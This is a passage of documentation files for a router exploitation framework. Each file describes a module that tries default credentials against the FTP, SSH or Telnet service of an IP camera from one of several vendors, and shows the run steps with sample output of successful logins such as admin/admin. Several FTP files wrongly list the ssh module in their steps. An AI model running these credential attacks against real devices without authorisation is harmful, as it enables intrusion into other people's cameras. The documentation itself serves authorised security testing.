-------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/brickcom/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Brickcom Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/brickcom/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/brickcom/ftp_default_creds rsf (Brickcom Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Brickcom Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/brickcom/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Brickcom Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/brickcom/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/brickcom/ssh_default_creds rsf (Brickcom Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Brickcom Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/brickcom/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Brickcom Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/brickcom/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/brickcom/telnet_default_creds rsf (Brickcom Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Brickcom Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/canon/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Canon Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/canon/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/canon/ftp_default_creds rsf (Canon Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Canon Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/canon/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Canon Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/canon/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/canon/ssh_default_creds rsf (Canon Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Canon Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/canon/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Canon Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/canon/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/canon/telnet_default_creds rsf (Canon Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Canon Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/cisco/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Cisco Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/cisco/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/cisco/ftp_default_creds rsf (Cisco Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Cisco Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/cisco/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Cisco Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/cisco/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/cisco/ssh_default_creds rsf (Cisco Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Cisco Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/cisco/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Cisco Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/cisco/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/cisco/telnet_default_creds rsf (Cisco Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Cisco Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/dlink/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against D-Link Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/dlink/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/dlink/ftp_default_creds rsf (D-Link Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (D-Link Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/dlink/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against D-Link Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/dlink/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/dlink/ssh_default_creds rsf (D-Link Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (D-Link Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/dlink/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against D-Link Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/dlink/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/dlink/telnet_default_creds rsf (D-Link Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (D-Link Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/geovision/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against GeoVision Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/geovision/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/geovision/ftp_default_creds rsf (GeoVision Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (GeoVision Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/geovision/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against GeoVision Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/geovision/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/geovision/ssh_default_creds rsf (GeoVision Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (GeoVision Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/geovision/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against GeoVision Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/geovision/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/geovision/telnet_default_creds rsf (GeoVision Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (GeoVision Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/grandstream/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Grandstream Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/grandstream/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/grandstream/ftp_default_creds rsf (Grandstream Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Grandstream Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/grandstream/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Grandstream Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/grandstream/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/grandstream/ssh_default_creds rsf (Grandstream Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Grandstream Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/grandstream/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Grandstream Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/grandstream/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/grandstream/telnet_default_creds rsf (Grandstream Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Grandstream Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/hikvision/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Hikvision Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/hikvision/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/hikvision/ftp_default_creds rsf (Hikvision Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Hikvision Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/hikvision/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Hikvision Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/hikvision/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/hikvision/ssh_default_creds rsf (Hikvision Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Hikvision Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/hikvision/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Hikvision Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/hikvision/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/hikvision/telnet_default_creds rsf (Hikvision Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Hikvision Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/honeywell/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Honeywell Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/honeywell/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/honeywell/ftp_default_creds rsf (Honeywell Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Honeywell Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/honeywell/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Honeywell Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/honeywell/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/honeywell/ssh_default_creds rsf (Honeywell Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Honeywell Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` ================================================ FILE: docs/modules/creds/cameras/honeywell/telnet_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against Honeywell Camera Telnet service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/honeywell/telnet_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/honeywell/telnet_default_creds rsf (Honeywell Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Honeywell Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` ================================================ FILE: docs/modules/creds/cameras/iqinvision/ftp_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against IQInvision Camera FTP service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/iqinvision/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/iqinvision/ftp_default_creds rsf (IQInvision Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (IQInvision Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` ================================================ FILE: docs/modules/creds/cameras/iqinvision/ssh_default_creds.md ================================================ ## Description Module performs dictionary attack with default credentials against IQInvision Camera SSH service. If valid credentials are found, they are displayed to the user. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use creds/cameras/iqinvision/ssh_default_creds` 3. Do: `set target [TargetIP]` 4. Do: `run` 5. If valid credentials are found, they are displayed to the user. ## Scenarios ``` rsf > use creds/cameras/iqinvision/ssh_default_creds rsf (IQInvision Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (IQInvision Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port 